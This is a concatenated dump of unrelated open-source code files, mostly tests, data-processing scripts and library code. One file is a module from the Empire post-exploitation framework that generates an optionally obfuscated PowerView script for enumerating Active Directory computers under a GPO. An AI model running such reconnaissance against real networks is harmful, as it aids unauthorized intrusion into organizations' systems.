source = deepcopy(DESCRIPTOR)
report = validate(source)
assert log(report) == []
def test_check_file_integrity_invalid(log):
source = deepcopy(DESCRIPTOR)
source['resources'][0]['bytes'] += 1
source['resources'][0]['hash'] += 'a'
report = validate(source)
assert report['tables'][0]['errors'] == [{
'code': 'source-error',
'message': 'Calculated size "30" and hash "a1fd6c5ff3494f697874deeb07f69f8667e903dd94a7bc062dd57550cea26da8" differ(s) from declared value(s)',
'message-data': {}
}]
def test_check_file_integrity_size(log):
source = deepcopy(DESCRIPTOR)
source['resources'][0]['hash'] = None
report = validate(source)
assert log(report) == []
def test_check_file_integrity_size_invalid(log):
source = deepcopy(DESCRIPTOR)
source['resources'][0]['bytes'] += 1
source['resources'][0]['hash'] = None
report = validate(source)
assert report['tables'][0]['errors'] == [{
'code': 'source-error',
'message': 'Calculated size "30" differ(s) from declared value(s)',
'message-data': {}
}]
def test_check_file_integrity_hash(log):
source = deepcopy(DESCRIPTOR)
source['resources'][0]['bytes'] = None
report = validate(source)
assert log(report) == []
def test_check_file_integrity_hash_invalid(log):
source = deepcopy(DESCRIPTOR)
source['resources'][0]['bytes'] = None
source['resources'][0]['hash'] += 'a'
report = validate(source)
assert report['tables'][0]['errors'] == [{
'code': 'source-error',
'message': 'Calculated hash "a1fd6c5ff3494f697874deeb07f69f8667e903dd94a7bc062dd57550cea26da8" differ(s) from declared value(s)',
'message-data': {}
}]
def test_check_file_integrity_invalid(log):
source = deepcopy(DESCRIPTOR)
source['resources'][0]['hash'] = 'not-supported-hash'
report = validate(source)
assert report['warnings'] == [
'Resource "resource1" does not use the SHA256 hash. The check will be skipped',
]
# Preset
def test_preset_datapackage():
warnings, tables = datapackage('data/datapackages/valid/datapackage.json')
assert len(warnings) == 0
assert len(tables) == 2
# Issues
def test_preset_datapackage_non_tabular_datapackage_issue_170():
warnings, tables = datapackage('data/non_tabular_datapackage.json')
assert len(warnings) == 0
assert len(tables) == 2
def test_preset_datapackage_mixed_datapackage_issue_170():
warnings, tables = datapackage('data/mixed_datapackage.json')
assert len(warnings) == 0
assert len(tables) == 2
def test_preset_datapackage_invalid_json_issue_192():
warnings, tables = datapackage('data/invalid_json.json')
assert len(warnings) == 1
assert len(tables) == 0
assert 'Unable to parse JSON' in warnings[0]
|
robosat/osm/core.py | iboates/robosat | 1,844 | 11087288 | <reponame>iboates/robosat<filename>robosat/osm/core.py
import os
import uuid
import geojson
class FeatureStorage:
"""Stores features on disk and handles batching.
Note: you have to call flush at the end to flush the last partial batch.
"""
def __init__(self, out, batch):
assert batch > 0
self.out = out
self.batch = batch
self.features = []
def add(self, feature):
if len(self.features) >= self.batch:
self.flush()
self.features.append(feature)
def flush(self):
if not self.features:
return
collection = geojson.FeatureCollection(self.features)
base, ext = os.path.splitext(self.out)
suffix = uuid.uuid4().hex
out = "{}-{}{}".format(base, suffix, ext)
with open(out, "w") as fp:
geojson.dump(collection, fp)
self.features.clear()
def is_polygon(way):
"""Checks if the way is a polygon.
Args
way: the osmium.osm.Way to check.
Returns:
True if the way is a polygon, False otherwise.
Note: The geometry shape can still be invalid (e.g. self-intersecting).
"""
if not way.is_closed():
return False
if len(way.nodes) < 4:
return False
return True
|
apprise/plugins/NotifyXMPP/SleekXmppAdapter.py | linkmauve/apprise | 4,764 | 11087319 | # -*- coding: utf-8 -*-
import ssl
from os.path import isfile
import logging
# Default our global support flag
SLEEKXMPP_SUPPORT_AVAILABLE = False
try:
# Import sleekxmpp if available
import sleekxmpp
SLEEKXMPP_SUPPORT_AVAILABLE = True
except ImportError:
# No problem; we just simply can't support this plugin because we're
# either using Linux, or simply do not have sleekxmpp installed.
pass
class SleekXmppAdapter(object):
"""
Wrapper to sleekxmpp
"""
# Reference to XMPP client.
xmpp = None
# Whether everything succeeded
success = False
# The default protocol
protocol = 'xmpp'
# The default secure protocol
secure_protocol = 'xmpps'
# The default XMPP port
default_unsecure_port = 5222
# The default XMPP secure port
default_secure_port = 5223
# Taken from https://golang.org/src/crypto/x509/root_linux.go
CA_CERTIFICATE_FILE_LOCATIONS = [
# Debian/Ubuntu/Gentoo etc.
"/etc/ssl/certs/ca-certificates.crt",
# Fedora/RHEL 6
"/etc/pki/tls/certs/ca-bundle.crt",
# OpenSUSE
"/etc/ssl/ca-bundle.pem",
# OpenELEC
"/etc/pki/tls/cacert.pem",
# CentOS/RHEL 7
"/etc/pki/ca-trust/extracted/pem/tls-ca-bundle.pem",
]
# This entry is a bit hacky, but it allows us to unit-test this library
# in an environment that simply doesn't have the sleekxmpp package
# available to us.
#
# If anyone is seeing this had knows a better way of testing this
# outside of what is defined in test/test_xmpp_plugin.py, please
# let me know! :)
_enabled = SLEEKXMPP_SUPPORT_AVAILABLE
def __init__(self, host=None, port=None, secure=False,
verify_certificate=True, xep=None, jid=None, password=<PASSWORD>,
body=None, targets=None, before_message=None, logger=None):
"""
Initialize our SleekXmppAdapter object
"""
self.host = host
self.port = port
self.secure = secure
self.verify_certificate = verify_certificate
self.xep = xep
self.jid = jid
self.password = password
self.body = body
self.targets = targets
self.before_message = before_message
self.logger = logger or logging.getLogger(__name__)
# Use the Apprise log handlers for configuring the sleekxmpp logger.
apprise_logger = logging.getLogger('apprise')
sleek_logger = logging.getLogger('sleekxmpp')
for handler in apprise_logger.handlers:
sleek_logger.addHandler(handler)
sleek_logger.setLevel(apprise_logger.level)
if not self.load():
raise ValueError("Invalid XMPP Configuration")
def load(self):
# Prepare our object
self.xmpp = sleekxmpp.ClientXMPP(self.jid, self.password)
# Register our session
self.xmpp.add_event_handler("session_start", self.session_start)
for xep in self.xep:
# Load xep entries
try:
self.xmpp.register_plugin('xep_{0:04d}'.format(xep))
except sleekxmpp.plugins.base.PluginNotFound:
self.logger.warning(
'Could not register plugin {}'.format(
'xep_{0:04d}'.format(xep)))
return False
if self.secure:
# Don't even try to use the outdated ssl.PROTOCOL_SSLx
self.xmpp.ssl_version = ssl.PROTOCOL_TLSv1
# If the python version supports it, use highest TLS version
# automatically
if hasattr(ssl, "PROTOCOL_TLS"):
# Use the best version of TLS available to us
self.xmpp.ssl_version = ssl.PROTOCOL_TLS
self.xmpp.ca_certs = None
if self.verify_certificate:
# Set the ca_certs variable for certificate verification
self.xmpp.ca_certs = next(
(cert for cert in self.CA_CERTIFICATE_FILE_LOCATIONS
if isfile(cert)), None)
if self.xmpp.ca_certs is None:
self.logger.warning(
'XMPP Secure comunication can not be verified; '
'no local CA certificate file')
return False
# We're good
return True
def process(self):
"""
Thread that handles the server/client i/o
"""
# Establish connection to XMPP server.
# To speed up sending messages, don't use the "reattempt" feature,
# it will add a nasty delay even before connecting to XMPP server.
if not self.xmpp.connect((self.host, self.port),
use_ssl=self.secure, reattempt=False):
default_port = self.default_secure_port \
if self.secure else self.default_unsecure_port
default_schema = self.secure_protocol \
if self.secure else self.protocol
# Log connection issue
self.logger.warning(
'Failed to authenticate {jid} with: {schema}://{host}{port}'
.format(
jid=self.jid,
schema=default_schema,
host=self.host,
port='' if not self.port or self.port == default_port
else ':{}'.format(self.port),
))
return False
# Process XMPP communication.
self.xmpp.process(block=True)
return self.success
def session_start(self, *args, **kwargs):
"""
Session Manager
"""
targets = list(self.targets)
if not targets:
# We always default to notifying ourselves
targets.append(self.jid)
while len(targets) > 0:
# Get next target (via JID)
target = targets.pop(0)
# Invoke "before_message" event hook.
self.before_message()
# The message we wish to send, and the JID that will receive it.
self.xmpp.send_message(mto=target, mbody=self.body, mtype='chat')
# Using wait=True ensures that the send queue will be
# emptied before ending the session.
self.xmpp.disconnect(wait=True)
# Toggle our success flag
self.success = True
|
tests/gen_test.py | beatrizuezu/pycpfcnpj | 127 | 11087324 | <reponame>beatrizuezu/pycpfcnpj
import unittest
from pycpfcnpj import gen, cpf, cnpj
class GenerateCPFTest(unittest.TestCase):
"""docstring for GenerateCPFTest"""
def setUp(self):
self.masked_valid_cpf = gen.cpf_with_punctuation()
def test_validate_masked_cnpj_true(self):
self.assertTrue(cpf.validate(self.masked_valid_cpf))
def test_valif_cpf_without_mask_true(self):
cpf_result =(self.masked_valid_cpf.replace(".","")).replace("-","")
self.assertTrue(cpf.validate(cpf_result))
class GenerateCNPJTest(unittest.TestCase):
"""docstring for GenerateCNPJTest"""
def setUp(self):
self.masked_valid_cnpj = gen.cnpj_with_punctuation()
def test_validate_masked_cnpj_true(self):
self.assertTrue(cnpj.validate(self.masked_valid_cnpj))
def test_valid_cnpj_without_mask_true(self):
cnpj_result =(self.masked_valid_cnpj.replace(".","")).replace("-","")
self.assertTrue(cnpj.validate(cnpj_result)) |
基础教程/A2-神经网络基本原理/第5步 - 非线性分类/src/ch12-MultipleLayerNetwork/HelperClass2/ActivatorFunction_2_0.py | microsoft/ai-edu | 11,094 | 11087336 | # Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE file in the project root for full license information.
"""
Version 2.0
"""
import numpy as np
class CActivator(object):
# z = 本层的wx+b计算值矩阵
def forward(self, z):
pass
# z = 本层的wx+b计算值矩阵
# a = 本层的激活函数输出值矩阵
# delta = 上(后)层反传回来的梯度值矩阵
def backward(self, z, a, delta):
pass
# 直传函数,相当于无激活
class Identity(CActivator):
def forward(self, z):
return z
def backward(self, z, a, delta):
return delta, a
class Sigmoid(CActivator):
def forward(self, z):
a = 1.0 / (1.0 + np.exp(-z))
return a
def backward(self, z, a, delta):
da = np.multiply(a, 1-a)
dz = np.multiply(delta, da)
return dz, da
class Tanh(CActivator):
def forward(self, z):
a = 2.0 / (1.0 + np.exp(-2*z)) - 1.0
return a
def backward(self, z, a, delta):
da = 1 - np.multiply(a, a)
dz = np.multiply(delta, da)
return dz, da
class Relu(CActivator):
def forward(self, z):
a = np.maximum(z, 0)
return a
# 注意relu函数判断是否大于1的根据是正向的wx+b=z的值,而不是a值
def backward(self, z, a, delta):
da = np.zeros(z.shape)
da[z>0] = 1
dz = da * delta
return dz, da
|
empire/server/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py | chenxiangfang/Empire | 2,541 | 11087366 | <gh_stars>1000+
from __future__ import print_function
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common powerview.ps1 module source code
module_source = main_menu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(module_source, 'r')
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
module_code = f.read()
f.close()
# get just the code needed for the specified function
script = helpers.strip_powershell_comments(module_code)
script += "\nGet-DomainOU "
for option, values in params.items():
if option.lower() != "agent" and option.lower() != "guid" and option.lower() != "outputfunction":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values)
script += "-GPLink " + str(params['GUID']) + " | %{ Get-DomainComputer -SearchBase $_.distinguishedname"
for option, values in params.items():
if option.lower() != "agent" and option.lower() != "guid" and option.lower() != "outputfunction":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values)
outputf = params.get("OutputFunction", "Out-String")
script += f"}} | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"'
if obfuscate:
script = helpers.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=obfuscation_command)
script = data_util.keyword_obfuscation(script)
return script
|
bin/tower.py | theosech/ec | 290 | 11087373 | <reponame>theosech/ec
try:
import binutil # required to import from dreamcoder modules
except ModuleNotFoundError:
import bin.binutil # alt import if called as module
from dreamcoder.domains.tower.main import main, TowerCNN, tower_options
from dreamcoder.dreamcoder import commandlineArguments
from dreamcoder.utilities import numberOfCPUs
if __name__ == '__main__':
arguments = commandlineArguments(
featureExtractor=TowerCNN,
CPUs=numberOfCPUs(),
helmholtzRatio=0.5,
recognitionTimeout=3600,
iterations=6,
a=3,
structurePenalty=1,
pseudoCounts=10,
topK=2,
maximumFrontier=5,
extras=tower_options)
main(arguments)
|
test/effective_user_test.py | blekinge/snakebite | 691 | 11087383 | from minicluster_testbase import MiniClusterTestBase
from snakebite.client import Client
import os
class EffectiveUserTest(MiniClusterTestBase):
ERR_MSG_TOUCH = "org.apache.hadoop.security.AccessControlException\nPermission denied: user=__foobar"
ERR_MSG_STAT = "`/foobar2': No such file or directory"
VALID_FILE = '/foobar'
INVALID_FILE = '/foobar2'
def setUp(self):
self.custom_client = Client(self.cluster.host, self.cluster.port)
self.custom_foobar_client = Client(host=self.cluster.host,
port=self.cluster.port,
effective_user='__foobar')
def test_touch(self):
print tuple(self.custom_client.touchz([self.VALID_FILE]))
try:
tuple(self.custom_foobar_client.touchz([self.INVALID_FILE]))
except Exception, e:
self.assertTrue(e.message.startswith(self.ERR_MSG_TOUCH))
self.custom_client.stat([self.VALID_FILE])
try:
self.custom_client.stat([self.INVALID_FILE])
except Exception, e:
self.assertEquals(e.message, self.ERR_MSG_STAT)
|
recipes/train_rasa/examples_to_rasa.py | CvH/voice2json | 913 | 11087388 | #!/usr/bin/env python3
import sys
import json
from collections import defaultdict
examples_by_intent = defaultdict(list)
# Gather all examples by intent name
for line in sys.stdin:
example = json.loads(line)
intent_name = example["intent"]["name"]
examples_by_intent[intent_name].append(example)
# Write data in RasaNLU markdown training format
for intent_name, examples in examples_by_intent.items():
print(f"## intent:{intent_name}")
for example in examples:
# Create mapping from start/stop character indexes to example entities
entities_by_start = {e["raw_start"]: e for e in example["entities"]}
entities_by_end = {e["raw_end"]: e for e in example["entities"]}
# Current character index
char_idx = 0
# Final list of tokens that will be printed for the example
tokens_to_print = []
# Current entity
entity = None
# Tokens that belong to the current entity
entity_tokens = []
# Process "raw" tokens without substitutions
for token in example["raw_tokens"]:
if char_idx in entities_by_start:
# Start entity
entity = entities_by_start[char_idx]
entity_tokens = []
if entity is None:
# Use token as-is
tokens_to_print.append(token)
else:
# Accumulate into entity token list
entity_tokens.append(token)
# Advance character index in raw text
char_idx += len(token) + 1 # space
if (char_idx - 1) in entities_by_end:
# Finish entity
entity_str = entity["entity"]
if entity["value"] != entity["raw_value"]:
# Include substitution
entity_str += f":{entity['value']}"
# Create Markdown-style entity
token_str = "[" + " ".join(entity_tokens) + f"]({entity_str})"
tokens_to_print.append(token_str)
entity = None
# Print example
print("-", " ".join(tokens_to_print))
# Blank line between intents
print("")
|
panoptic_mapping_utils/src/flat_dataset/flat_data_player.py | ethz-asl/panoptic_mapping | 101 | 11087402 | <reponame>ethz-asl/panoptic_mapping<gh_stars>100-1000
#!/usr/bin/env python3
import os
import json
import csv
import rospy
from sensor_msgs.msg import Image
from geometry_msgs.msg import PoseStamped
from cv_bridge import CvBridge
import cv2
from PIL import Image as PilImage
import numpy as np
import tf
from std_srvs.srv import Empty, EmptyResponse
from panoptic_mapping_msgs.msg import DetectronLabel, DetectronLabels
class FlatDataPlayer(object):
def __init__(self):
""" Initialize ros node and read params """
# params
self.data_path = rospy.get_param(
'~data_path', '/home/lukas/Documents/Datasets/flat_dataset/run1')
self.global_frame_name = rospy.get_param('~global_frame_name', 'world')
self.sensor_frame_name = rospy.get_param('~sensor_frame_name',
"depth_cam")
self.use_detectron = rospy.get_param('~use_detectron', False)
self.play_rate = rospy.get_param('~play_rate', 1.0)
self.wait = rospy.get_param('~wait', False)
self.max_frames = rospy.get_param('~max_frames', 1e9)
self.refresh_rate = 100 # Hz
# ROS
self.color_pub = rospy.Publisher("~color_image", Image, queue_size=100)
self.depth_pub = rospy.Publisher("~depth_image", Image, queue_size=100)
self.id_pub = rospy.Publisher("~id_image", Image, queue_size=100)
if self.use_detectron:
self.label_pub = rospy.Publisher("~labels",
DetectronLabels,
queue_size=100)
self.pose_pub = rospy.Publisher("~pose", PoseStamped, queue_size=100)
self.tf_broadcaster = tf.TransformBroadcaster()
# setup
self.cv_bridge = CvBridge()
stamps_file = os.path.join(self.data_path, 'timestamps.csv')
self.times = []
self.ids = []
self.current_index = 0 # Used to iterate through
if not os.path.isfile(stamps_file):
rospy.logfatal("No timestamp file '%s' found." % stamps_file)
with open(stamps_file, 'r') as read_obj:
csv_reader = csv.reader(read_obj)
for row in csv_reader:
if row[0] == "ImageID":
continue
self.ids.append(str(row[0]))
self.times.append(float(row[1]) / 1e9)
self.ids = [x for _, x in sorted(zip(self.times, self.ids))]
self.times = sorted(self.times)
self.times = [(x - self.times[0]) / self.play_rate for x in self.times]
self.start_time = None
if self.wait:
self.start_srv = rospy.Service('~start', Empty, self.start)
else:
self.start(None)
def start(self, _):
self.running = True
self.timer = rospy.Timer(rospy.Duration(1.0 / self.refresh_rate),
self.callback)
return EmptyResponse()
def callback(self, _):
# Check we should be publishing.
if not self.running:
return
# Check we're not done.
if self.current_index >= len(self.times):
rospy.loginfo("Finished playing the dataset.")
rospy.signal_shutdown("Finished playing the dataset.")
return
# Check the time.
now = rospy.Time.now()
if self.start_time is None:
self.start_time = now
if self.times[self.current_index] > (now - self.start_time).to_sec():
return
# Get all data and publish.
file_id = os.path.join(self.data_path, self.ids[self.current_index])
# Color.
color_file = file_id + "_color.png"
depth_file = file_id + "_depth.tiff"
pose_file = file_id + "_pose.txt"
files = [color_file, depth_file, pose_file]
if self.use_detectron:
pred_file = file_id + "_predicted.png"
labels_file = file_id + "_labels.json"
files += [pred_file, labels_file]
else:
pred_file = file_id + "_segmentation.png"
files.append(pred_file)
for f in files:
if not os.path.isfile(f):
rospy.logwarn("Could not find file '%s', skipping frame." % f)
self.current_index += 1
return
# Load and publish Color image.
cv_img = cv2.imread(color_file)
img_msg = self.cv_bridge.cv2_to_imgmsg(cv_img, "bgr8")
img_msg.header.stamp = now
img_msg.header.frame_id = self.sensor_frame_name
self.color_pub.publish(img_msg)
# Load and publish ID image.
cv_img = cv2.imread(pred_file)
img_msg = self.cv_bridge.cv2_to_imgmsg(cv_img[:, :, 0], "8UC1")
img_msg.header.stamp = now
img_msg.header.frame_id = self.sensor_frame_name
self.id_pub.publish(img_msg)
# Load and publish labels.
if self.use_detectron:
label_msg = DetectronLabels()
label_msg.header.stamp = now
with open(labels_file) as json_file:
data = json.load(json_file)
for d in data:
if 'instance_id' not in d:
d['instance_id'] = 0
if 'score' not in d:
d['score'] = 0
label = DetectronLabel()
label.id = d['id']
label.instance_id = d['instance_id']
label.is_thing = d['isthing']
label.category_id = d['category_id']
label.score = d['score']
label_msg.labels.append(label)
self.label_pub.publish(label_msg)
# Load and publish depth image. These are optional.
cv_img = PilImage.open(depth_file)
img_msg = self.cv_bridge.cv2_to_imgmsg(np.array(cv_img), "32FC1")
img_msg.header.stamp = now
img_msg.header.frame_id = self.sensor_frame_name
self.depth_pub.publish(img_msg)
# Load and publish transform.
if os.path.isfile(pose_file):
pose_data = [float(x) for x in open(pose_file, 'r').read().split()]
transform = np.eye(4)
for row in range(4):
for col in range(4):
transform[row, col] = pose_data[row * 4 + col]
rotation = tf.transformations.quaternion_from_matrix(transform)
self.tf_broadcaster.sendTransform(
(transform[0, 3], transform[1, 3], transform[2, 3]), rotation,
now, self.sensor_frame_name, self.global_frame_name)
pose_msg = PoseStamped()
pose_msg.header.stamp = now
pose_msg.header.frame_id = self.global_frame_name
pose_msg.pose.position.x = pose_data[3]
pose_msg.pose.position.y = pose_data[7]
pose_msg.pose.position.z = pose_data[11]
pose_msg.pose.orientation.x = rotation[0]
pose_msg.pose.orientation.y = rotation[1]
pose_msg.pose.orientation.z = rotation[2]
pose_msg.pose.orientation.w = rotation[3]
self.pose_pub.publish(pose_msg)
self.current_index += 1
if self.current_index > self.max_frames:
rospy.signal_shutdown("Played reached max frames (%i)" %
self.max_frames)
if __name__ == '__main__':
rospy.init_node('flat_data_player')
flat_data_player = FlatDataPlayer()
rospy.spin()
|
lib/python/plash/macros/shortcuts.py | parampavar/plash | 346 | 11087406 | <gh_stars>100-1000
from plash.eval import eval, register_macro
ALIASES = dict(
x=[["run"]],
l=[["layer"]],
f=[["from"]],
# Update on an best effort basis. If possible keep versions that point to a
# latest release.
A=[["from", "alpine:edge"], ["apk"]],
U=[["from", "ubuntu:focal"], ["apt"]],
F=[["from", "fedora:32"], ["dnf"]],
D=[["from", "debian:sid"], ["apt"]],
C=[["from", "centos:8"], ["yum"]],
R=[["from", "archlinux:current"], ["pacman"]],
G=[["from", "gentoo:current"], ["emerge"]],
)
for name, macro in ALIASES.items():
def bounder(macro=macro):
def func(*args):
# list(args) throws an exception exception for some really funny reason
# therefore the list comprehension
args = [i for i in args]
return eval(macro[:-1] + [macro[-1] + args])
func.__doc__ = "alias for: {}[ARG1 [ARG2 [...]]]".format(
" ".join("--" + i[0] + " " + " ".join(i[1:]) for i in macro)
)
return func
func = bounder()
register_macro(name=name, group="macros")(func)
|
docs/render_templates.py | ticlazau/deon | 223 | 11087438 | <reponame>ticlazau/deon
from pathlib import Path
import click
from click.testing import CliRunner
from jinja2 import Environment, FileSystemLoader
import yaml
from deon.cli import main as deon_command
from deon.formats import Markdown, EXTENSIONS
from deon.parser import Checklist
env = Environment(
loader=FileSystemLoader("md_templates"),
)
TEMPLATE_AND_OUTPUT = {
"index.tpl": Path("docs/index.md"),
"examples.tpl": Path("docs/examples.md"),
"readme.tpl": Path("../README.md"),
}
def create_context():
cl = Checklist.read(Path(__file__).absolute().parents[1] / "deon" / "assets" / "checklist.yml")
checklist_template = Markdown(cl)
rendered_checklist = checklist_template.render()
runner = CliRunner()
result = runner.invoke(deon_command, ["--help"])
table = make_table_of_links()
return {
"default_checklist": rendered_checklist,
"cli_options": result.output,
"supported_formats": EXTENSIONS,
"links_table": table,
}
def make_table_of_links():
"""
Generates table where lefthand column contains checklist items (from checklist.yml) and righthand column contains
hyperlinks to examples where things have gone wrong (from examples.yml). Table appears in docs/docs/examples.md.
"""
root = Path(__file__).absolute().parents[1] / "deon" / "assets"
cl = Checklist.read(root / "checklist.yml")
with open(root / "examples_of_ethical_issues.yml", "r") as f:
refs = yaml.load(f, Loader=yaml.SafeLoader)
refs_dict = dict()
for r in refs:
refs_dict[r["line_id"]] = r["links"]
template = """<center>Checklist Question</center> | <center>Examples of Ethical Issues</center>
--- | ---
{lines}
"""
line_template = "**{line_id} {line_summary}**: {line} | {row_text}"
section_title_template = " | <center>**{section_title}**</center>"
line_delimiter = "\n"
formatted_rows = []
for s in cl.sections:
# section title row
row = section_title_template.format(section_title=s.title)
formatted_rows.append(row)
for line in s.lines:
# create bulleted list of links for each checklist item in that section
bulleted_list = []
for link in refs_dict[line.line_id]:
text = link["text"]
url = link["url"]
bullet_hyperlink = f"<li>[{text}]({url})</li>"
bulleted_list.append(bullet_hyperlink)
formatted_bullets = "".join(bulleted_list)
row = line_template.format(
line_id=line.line_id,
line_summary=line.line_summary,
line=line.line,
row_text=f"<ul>{formatted_bullets}</ul>",
)
formatted_rows.append(row)
# bring all the rows together
all_rows = line_delimiter.join(formatted_rows)
return template.format(lines=all_rows)
@click.command()
def main():
ctx = create_context()
for t, o in TEMPLATE_AND_OUTPUT.items():
tmpl = env.get_template(t)
with open(o, "w", encoding="utf-8") as f:
(tmpl.stream(**ctx).dump(f))
if __name__ == "__main__":
main()
|
k2/python/tests/dense_fsa_vec_test.py | EmreOzkose/k2 | 491 | 11087456 | #!/usr/bin/env python3
#
# Copyright 2020 Mobvoi Inc. (authors: <NAME>)
#
# See ../../../LICENSE for clarification regarding multiple authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# To run this single test, use
#
# ctest --verbose -R dense_fsa_vec_test_py
import unittest
import k2
import torch
class TestDenseFsaVec(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.devices = [torch.device('cpu')]
if torch.cuda.is_available() and k2.with_cuda:
cls.devices.append(torch.device('cuda', 0))
if torch.cuda.device_count() > 1:
torch.cuda.set_device(1)
cls.devices.append(torch.device('cuda', 1))
def test_dense_fsa_vec(self):
for device in self.devices:
log_prob = torch.arange(20, dtype=torch.float32,
device=device).reshape(
2, 5, 2).log_softmax(dim=-1)
supervision_segments = torch.tensor(
[
# seq_index, start_time, duration
[0, 0, 3],
[0, 1, 4],
[1, 0, 2],
[0, 2, 3],
[1, 3, 2],
],
dtype=torch.int32)
dense_fsa_vec = k2.DenseFsaVec(log_prob, supervision_segments)
assert dense_fsa_vec.dim0() == 5, 'It should contain 5 segments'
assert dense_fsa_vec.device == device
assert dense_fsa_vec.duration.device == torch.device('cpu')
assert torch.all(
torch.eq(dense_fsa_vec.duration, supervision_segments[:, 2]))
del dense_fsa_vec._duration
assert torch.all(
torch.eq(dense_fsa_vec.duration, supervision_segments[:, 2]))
assert torch.allclose(dense_fsa_vec.scores[:3, 1:],
log_prob[0][0:3])
offset = 3 + 1
assert torch.allclose(dense_fsa_vec.scores[offset:offset + 4, 1:],
log_prob[0][1:5])
offset += 4 + 1
assert torch.allclose(dense_fsa_vec.scores[offset:offset + 2, 1:],
log_prob[1][0:2])
offset += 2 + 1
assert torch.allclose(dense_fsa_vec.scores[offset:offset + 3, 1:],
log_prob[0][2:5])
offset += 3 + 1
assert torch.allclose(dense_fsa_vec.scores[offset:offset + 2, 1:],
log_prob[1][3:5])
dense_fsa_vec.to('cpu')
def test_duration(self):
for device in self.devices:
log_prob = torch.arange(20, dtype=torch.float32,
device=device).reshape(
2, 5, 2).log_softmax(dim=-1)
supervision_segments = torch.tensor(
[
# seq_index, start_time, duration
[0, 0, 3],
[0, 4, 2], # exceed 1
[0, 3, 4], # exceed 2
[1, 1, 7], # exceed 3
],
dtype=torch.int32)
dense_fsa_vec = k2.DenseFsaVec(log_prob,
supervision_segments,
allow_truncate=3)
assert torch.all(
torch.eq(dense_fsa_vec.duration, torch.tensor([3, 1, 2, 4])))
assert torch.allclose(dense_fsa_vec.scores[:3, 1:],
log_prob[0][0:3])
offset = 3 + 1
assert torch.allclose(dense_fsa_vec.scores[offset:offset + 1, 1:],
log_prob[0][4:5])
offset += 1 + 1
assert torch.allclose(dense_fsa_vec.scores[offset:offset + 2, 1:],
log_prob[0][3:5])
offset += 2 + 1
assert torch.allclose(dense_fsa_vec.scores[offset:offset + 4, 1:],
log_prob[1][1:5])
dense_fsa_vec.to('cpu')
if __name__ == '__main__':
unittest.main()
|
exampleSite/algolia-index-upload.py | timatlee/bilberry-hugo-theme | 274 | 11087487 | <reponame>timatlee/bilberry-hugo-theme
import argparse
import json
from algoliasearch.search_client import SearchClient
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--index-file', help="Index file to upload to Algolia")
parser.add_argument('-a', '--app-id', help="Algolia application ID")
parser.add_argument('-k', '--admin-api-key', help="Algolia admin API key")
parser.add_argument('-n', '--index-name', help="Algolia index name")
args = parser.parse_args()
with open(args.index_file, 'r') as file:
indices_json = file.read().replace('\n', '')
indices = json.loads(indices_json)
client = SearchClient.create(args.app_id, args.admin_api_key)
index = client.init_index(args.index_name)
index.save_objects(indices)
|
src/test/tests/queries/revolved_surface_area.py | visit-dav/vis | 226 | 11087510 | <filename>src/test/tests/queries/revolved_surface_area.py
# ----------------------------------------------------------------------------
# CLASSES: nightly
#
# Test Case: revolved_surface_area.py
# Tests: queries - Revolved surface area of 2D plot.
#
# Defect ID: VisIt00004666, '3260, '3261
#
# Programmer: <NAME>
# Date: March 30, 2004
#
# Modifications:
# <NAME>, Thu Apr 29 07:40:58 PDT 2004
# Slice defaults atts have changed, update accordingly.
#
# <NAME>, Thu Jan 12 15:57:52 PST 2006
# Added additional tests ('3260, '3261).
#
# <NAME>, Wed Jan 20 07:37:11 PST 2010
# Added ability to swtich between Silo's HDF5 and PDB data.
# ----------------------------------------------------------------------------
# Test for topological dimension 2.
TurnOnAllAnnotations()
OpenDatabase(silo_data_path("rect2d.silo"))
AddPlot("Pseudocolor", "d")
DrawPlots()
Query("Revolved surface area")
text = GetQueryOutputString()
TestText("revolved_surface_area_01", text)
# Test with isosurface operator.
DeleteAllPlots()
AddPlot("Pseudocolor", "d")
AddOperator("Isosurface")
iso_atts = IsosurfaceAttributes();
iso_atts.contourValue = (.25)
iso_atts.contourMethod = iso_atts.Value
SetOperatorOptions(iso_atts)
DrawPlots()
Query("Revolved surface area")
text = GetQueryOutputString()
TestText("revolved_surface_area_02", text)
# Test for boundary plot.
DeleteAllPlots()
AddPlot("Boundary", "mat1")
DrawPlots()
Query("Revolved surface area")
text = GetQueryOutputString()
TestText("revolved_surface_area_03", text)
# Test with 3D, isosurface, slice.
DeleteAllPlots()
OpenDatabase(silo_data_path("rect3d.silo"))
AddPlot("Pseudocolor", "d")
AddOperator("Isosurface")
SetOperatorOptions(iso_atts)
AddOperator("Slice")
s = SliceAttributes()
s.originIntercept = 0.5
s.axisType = s.YAxis
SetOperatorOptions(s)
DrawPlots()
Query("Revolved surface area")
text = GetQueryOutputString()
TestText("revolved_surface_area_04", text)
RemoveLastOperator()
Query("Revolved surface area")
text = GetLastError()
TestText("revolved_surface_area_05", text)
Exit()
|
databuilder/databuilder/task/search/search_metadata_to_elasticsearch_task.py | kokizzu/amundsen | 1,169 | 11087535 | <gh_stars>1000+
# Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import logging
from datetime import date
from typing import (
Any, Generator, List,
)
from uuid import uuid4
from elasticsearch.exceptions import NotFoundError
from elasticsearch.helpers import parallel_bulk
from elasticsearch_dsl.connections import Connections, connections
